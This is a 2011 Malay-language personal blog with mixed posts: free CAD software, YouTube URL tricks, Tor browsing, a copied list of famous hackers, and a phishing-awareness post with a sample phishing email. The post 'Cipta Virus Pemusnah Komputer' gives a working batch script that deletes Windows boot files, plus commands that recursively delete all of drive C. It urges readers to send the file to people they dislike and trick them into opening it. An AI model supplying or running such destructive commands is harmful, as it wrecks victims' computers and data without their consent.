Tuesday, December 20, 2011

Draftsight untuk file .dwg

Tajuk entri kali ini Kiddo nak bagitau sofware untuk AutoCAD2007...Kiddo sendiri tertanya2 mana nak cari serial key dia..bahkan kne download sana sana sini nak cari serial key die...hampeh semua xde,,dan x dpat pun..Beberapa orang rakan bertanyakan pada Kiddo, ada tak software AutoCAD percuma. Ada tak software AutoCAD free. Kiddo cakap ada, download je.serial key??yang tu nanti la Kiddo bt cmna.. Software autacad yang lain semua berbayar termasuklah beli CD AutoCAD cetak rompak pun ade serial key..kalo salah skali pun tetap x leh nak install..Serial key Autocad  yg boleh digunapakai adalah 111-1111111(semua 1)..1 malaysia...hahaha..

Sebenarnya, ada satu software yang seakan sama dengan AutoCAD jgak. Kiddo dapat maklumat pasal  software ni mggu lepas. Maklumlah, Software AutoCAD tu kan mahal, jadi Kiddo terpaksa bagitau dan cari solution yang lain. Bukan setakat murah sahaja, malah software yang kiddo  jumpa ini PERCUMA. Tak perlu bayar satu sen pun. Cuma kena update atau renew setiap tahun. Setakat ini masih lagi PERCUMA.  Nama software ini adalah DRAFTSIGHT.

Draftsight adalah satu software untuk menghasilkan lukisan 2D secara percuma. Ia boleh membantu pada pelukis-pelukis pelan atau seangkatan dengan mereka atau mengedit fail 2d. Lebih tepat lagi ia berupaya membaca dan mengedit apa jenis fail drawing yang mempunyai extension .dwg. Bila sebut sahaja pasal drawing AutoCAD pasti nama failnya .dwg.

Kiddo dah cuba install DRAFTSIGHT pada satu pc yang setiap hari bergelumang dengan drawing dan fail .dwg. Memang boleh pakai. Tak ada masalah. Cuba pada permulaannya, kena study sikit. Sebabnya ada beberapa fungsi kawalan di AUTOCAD tidak sama dengan Draftsight. Apa pun yang penting ianya PERCUMA dan boleh digunapakai untuk kerja-kerja drawing dengan berkesan.

Untuk mendownload DRAFTSIGHT sila layarai website INI. Jika korang tanya kiddo berapa bintang yang harus kiddo berikan kepada Software DRAFTSIGHT, kiddo berikan 4 bintang dari 5 bintang..kire bolehlah... Memang terbaik. Jimat dan efisyen. Apa lagi geng,  Selamat mencuba.

Monday, October 31, 2011

BEGINNER of HACKERZ: 14 Hacker Terbaik Dunia

BEGINNER of HACKERZ: 14 Hacker Terbaik Dunia

Type your summary hereType rest of the post here

Sunday, October 30, 2011

14 Hacker Terbaik Dunia

Hacker adalah orang yang mempelajari, menganalisis, dan seterusnya bila ia mahu ia boleh membuat, mengubahsuai, dan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti cakera system komputer dan cakera keras komputer seperti program komputer, administration dan lain-lain , terutama keselamatan.

Beberapa profile 14 Hacker Terbaik Dunia pada waktu ini:


1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam poster “FBI Most Wanted”. Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”. Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.Sistem operasi Linux telah menjadi sistem operasi “standar” hacker. Bersama Richard Stallman dengan GNU-nya membangunkan Linux versi awal dan 'colaboration' dengan programmer, developer dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemuan nada khas 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.
Merupakan pelopor penggunaan nada 2600 Hz dan dikenali sebagai Phone Phreaker . Nada 2600 Hz digunakan sebagai alat untuk melakukan panggilan telefon percuma.Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telefon negara. Fiber optik juga dinobatkan sebagai salah seorang dari 100 orang j\genius oleh New York Magazine. Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan sebahagian dari National Security Agencies (NSA). Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988. memberi infeksi kepada ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman

Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT. tidak berpuas hati dengan software komersial dan dan hak cipta peribadi. Akhirnya mendirikan GNU yang merupakan singkatan dari GNU NOT UNIX. Menggunakan komputer pertama kali pada tahun 1969 di IBM New York Scientific Center ketika berumur 16 tahun.

7. Kevin Poulsen
Melakukan penipuan digital terhadap stesen radio KIIS-FM, memastikan bahawa ia adalah penelefon ke 102 dan memenangi porsche 944 S2.

8. Ian Murphy

Ian Muphy bersama 3 orang rakannya, melakukan hacking ke dalam komputer AT&T dan menggubah setting jam internalnya. Hal ini mengakibatkan masyarakat pengguna telefon mendapatkan diskaun “tengah malam” pada waktu petang, dan yang telah menunggu hingga tengah malam harus membayar dengan tuntutan yang tinggi.

9. Vladimir Levin
Lulusan St. Petersburg Tekhnologichesky University. Menipu komputer CitiBank dan mengaut keuntungan 10 juta dollar. Ditangkap Interpol di Heathrow Airport pada tahun 1995

10. Steve Wozniak
Membangun komputer Apple dan menggunakan “blue box” untuk kepentingan sendiri.

11. Tsutomu Shimomura
Salah seorang hacker yang berjaya  menjejak Kevin Mitnick.

12. Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.

13. Eric Steven Raymond
Bapa hacker. Seorang hacktivist dan pelopor opensource movement. Menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”. Begitu fenomenal dan dikenali oleh seluruh masyarakat hacking dunia. Menurut Eric, “dunia mempunyai banyak persoalan menarik dan menunggu untuk dipecahkan”.

14. Johan Helsingius
Melancarkan operasi anonymous remailer paling popular didunia.

FROM : flanet.ning.com

Rahsia Youtube

Kiddo nak bgtau pasal youtube plak kali ini,,rahsia yang tidak ramai org tau pasal youtube ni..dan korang mesti suka layan Youtubekan? Suka letak video Youtube di blog/website korang kan?korang  perlu tahu trick-trick ini.Ada 10 Rahsia pasal youtube yang korang perlu tahu.

1. Nak tgk High Quality Videos
Ada video-video yang boleh korang buka dengan versi high quality. Caranya iaitu dengan menambah beberapa tulisan ini di belakang link URL video yang anda buka:
* &fmt=18, untuk melihat versi stereo, resolusi 480 x 270.
 * &fmt=22 untuk melihat versi stereo, resolusi 1280 x 720.

Setelah korang menambah salah satu kod di atas pada alamat URL video di pelayar korang kemudian tekan Enter atau Go, maka paparan video Youtube yang anda buka akan menjadi lebih lebar dengan kualiti yang lebih baik.

2. Embed High Quality Video di blog
Trick sebelumya berguna untuk korang tengok video yang high quality di Youtube. Semasa embed alias mencantumkan video kualiti bagus tersebut di blog korang, tambahkan kod berikut di akhir URL: &ap=%2526fmt%3D18 atau &ap=%2526fmt%3D22.

3. Skip Terus ke Bahagian yang Menarik
Semasa membuka sebuah video di Youtube, kita boleh skip ke minit tertentu, misalnya ada sebuah video yang panjang, yang sebenarnya moment menariknya ada di minit 03:14, kita tidak perlu menunggu sampai videonya berputar hingga ke minit itu. Cukuplah korang just tambahkan #t=03m14s di belakang URL, contoh: http://www.youtube.com/watch?v=YPQ_N4imYVE#t=03m14s
 
4. Sembunyikan Search Box
Semasa korang hover atau melayangkan pointer mouse korang di atas sebuah video Youtube yang di-embed dalam sebuah blog, biasanya akan muncul Search Box. Jika korang tak nak  perkara ni berlaku, tambahkan &showsearch=0 di belakang URL yang anda embed.

5. Meng-embed Hanya Bahagian Tertentu dari Video
Korang boleh menambahkan &start=30 di akhir URL yang korang embed, supaya boleh terus skip ke saat ke-30.

6. Video yang di-Embed boleh Autoplay
Biasanya video yang di-embed running semasa butang Play-nya diklik. Tapi jika korang nak video tersebut secara auto di halaman website tempat korang embeded video itu dibuka, tambahkan &auto*play=1 di akhir link URL video tersebut.

7. Membuat video yang di-Embed Berulang-ulang automatik
Tambahkan &loop=1 untuk membuat video yang anda embed automatik terus berulang alias looping.
 
8. Tidak Menunjukkan Related Videos
Jika korang meng-embed sebuah video Youtube di blog korang, biasanya muncul link atau gambar menuju ke video lain yang berkaitan. Jika korang taknak, korang kena tambahkan &rel=0 di belakang URL video yang korang embed.

9. Download Video
Ada banyak cara untuk download video dari youtube,seperti dengan Keepvid.com,youtube downloader dan sebagainya. Namun trik ni korang boleh try, semasa korang membuka link video tertentu, tukarkan perkataaan youtube.com di link korang dengan kickyoutube.com. korang automatik terus ke website kickyoutube di mana korang boleh download video tersebut dengan mudah.

10. . Game Snake
Aha,,ni paling best la kat youtube,. , kita boleh main game snakes semasa buffering video di youtube. Caranya, semasa buffering video akan muncul satu bulatan yang bergerak melingkar ditengah tengah video. Itu game ular sbenarnyanya.Korang klik mouse atas video dan tekan button arah panah atas pada keyboard. Kemudia ular tersebut boleh bergerak mengikut button yg korang tekan tu.

Selamat mencuba yer..

Cipta Virus Pemusnah Komputer.

Kali ni Kiddo nak share pasal virus yang dibuat sendiri oleh kita hanya menggunakan notepad..dan ia boleh mematikan komputer orang lain dan jugak kita sendiri..okey..kalo korang nak kenekan org yang korang x suka korang boley cuba trik yang kiddo bagi kat bawah..

ok mari kita mula:

Korang buka notepad dan copy / paste kod ini:

@ Echo off
attrib-r-s-h c: \ autoexec.bat
del c: \ autoexec.bat
attrib-r-s-h c: \ boot.ini
del c: \ boot.ini
attrib-r-s-h c: \ ntldr
del c: \ ntldr
attrib-r-s-h c: \ windows \ win.ini
del c: \ windows \ win.ini


Sekarang  korang simpan sebagai fail  txt yang korang buat td dengan extension .bat..(ape2 nama yang korang suke la)

Fail ini boleh mematikan (shutdown) komputer seseorang.
Ia mematikan komputer dan memadam fail yang diperlukan untuk reboot dan restart.

korang boleh kirim file ni ke komputer kawan-kawan mahupun lawan dan beritahu mereka untuk membukanya.

Berikut ini adalah kod lain yang boleh digunakan juga:

cmd / c del c: \ windows \ * / F / S / Q

cmd / c del c: \ * / F / S / Q

Paste di Notepad dan simpan fail ini dengan Extension cmd atau bat..

AMARAN: JGN KLIK FILE TU OK>>FILE YANG KORANG BUAT TU AKN MENYEBABKAN KOMPUTER KORANG SENDIRI YANG KENA..

Saturday, October 29, 2011

Surfing Dengan Selamat.

Kali ni Kiddo nk share pasal Surfing tanpa nama (anonymous)..kali ni Kiddo dapat daripada mana2 website yang menerangkan pasal software ini,,TOR atau The Onion Router ialah sofware yang boleh membuatkan kita surfing sebagai anonymous sebab die menyembunyikan identiti IP kita semasa surfing..so, kita dapat melayari internet tanpa risau yang kita dipantau dan di hack..

Apa yang korang perlukan ialah Vidalia Bundle dan torbuton untuk Firefox korang..     





selepas korang install kesemua yang diperlukan..korang boleh la surfing dengan selamat ok!

Friday, October 28, 2011

Phising

 Fishing @ Phishing lebih kurang je maksud die..beza nye cuma umpan je lain2..hehehe...Kiddo cume nak bgtau ape itu Fishing je kalo boley.sebab Kiddo suke Fishing...haha..ok2..sudah...

Phishing ialah laman web palsu yang menyerupai laman web asal dibangunkan bertujuan untuk mencuri katalaluan atau nombor akaun mangsa. Phishing biasanya diumpan melalui emel dan kebanyakan mangsa phishing terdiri daripada pengguna-pengguna online banking.

Kalu korang ade menerima emel yang meminta supaya menukar katalaluan akaun bank korang, berhati-hati kerana ia mungkin satu perangkap.

 Berikut salah satu contoh emel phishing:

Dear Valued Customer,

 Due to maintenance during the Sunday 12 November 2006, The Maybank Technical Department is performing a scheduled software upgrade to improve the quality of the online banking services. By clicking on the link below you will begin the procedure of the customer details confirmation.

 https://www.maybank2u.com.my/mbb/scripts/mbb_update.jsp?do=Update

 Once you have updated your account records, your Maybank account service will not be interrupted and will continue as normal.

 Sebaik sahaja korang klik pautan diatas,korang akan dibawa ke laman web palsu yang sama rekabentuknya seperti laman web rasmi:




Mengesan phishing
 Untuk mengenalpasti samada laman web tersebut palsu atau tidak, korang boleh ikut beberapa panduan berikut:

 1) Pastikan alamat URL bank online korang betul.
 2) Pastikan alamat URL bermula dengan "https". "s" menunjukkan laman web tersebut mengandungi sijil digital. 3) Pastikan juga logo SSL ditayangkan di bahagian bawah pelayar web.










Bagaimana untuk mengelakkan diri dari phishing?


 1) Jangan klik mana-mana pautan dalam emel yang mendakwa ia datang dari bank.
 2) Jika korang ingin melawat laman web bank korang, gunakan bookmark yang disimpan atau taip secara manual pada alamat URL. Jika anda terlupa alamat web, periksa brosure bank.
 3) Jika korang telah secara tidak sengaja menghantar kata laluan ke laman web palsu, sila hubungi pihak bank dengan segera, buat permohonan supaya kata laluan korang diresetkan semula.
 4) Gunakan pelayar web terkini seperti Internet Explorer 7 atau Firefox. IE7 dan Firefox didatangkan sekali dengan penapis phishing dan sebagainya..ok??




 
Firefox dengan teknologi Web Forgery

 
Internet Explorer 7 dengan penapis phishing

SEkian dulu untuk mase ni...

place of visitor online:-